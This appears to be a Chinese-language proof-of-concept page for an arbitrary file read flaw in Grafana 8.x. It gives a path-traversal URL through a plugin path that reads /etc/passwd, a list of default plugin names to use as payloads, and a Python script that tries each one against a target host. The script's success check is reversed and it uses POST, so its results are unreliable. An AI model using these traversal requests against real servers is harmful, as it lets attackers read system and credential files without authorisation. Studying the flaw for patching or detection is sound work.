Grafana任意文件读取

Grafana存在任意文件读取漏洞，通过默认存在的插件，可构造特殊的请求包读取服务器任意文件

Grafana 8.x

POC

HTTP://XXX.XXX.XXX.XXX/public/plugins/插件名称/../../../../../../../../../etc/passwd

paload.txt

alertmanager
grafana
loki
postgres
grafana-azure-monitor-datasource
mixed
prometheus
cloudwatch
graphite
mssql
tempo
dashboard
influxdb
mysql
testdata
elasticsearch
jaeger
opentsdb
zipkin
alertGroups
bargauge
debug
graph
live
piechart
status-history
timeseries
alertlist
candlestick
gauge
heatmap
logs
pluginlist
table
welcome
annolist
canvas
geomap
histogram
news
stat
table-old
xychart
barchart
dashlist
gettingstarted
icon
nodeGraph
state-timeline
text

检测脚本

import requests
import sys
 
args = str(sys.argv[1])
f = open("./paload.txt")
for line in f:
    url = "http://"+args+"/public/plugins/"+str.rstrip(line)+"/../../../../../../../../../../../etc/passwd"
    headers = {
        "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0",
    }
    req = requests.post(url, headers=headers,timeout=(3,7),allow_redirects=False)
    a=req.text
    str1='root'
    if a in str1:
        print('确认存在'+str.rstrip(line)+'路径,并存在漏洞!')
        print(url)
    else:
        print('不存在漏洞!')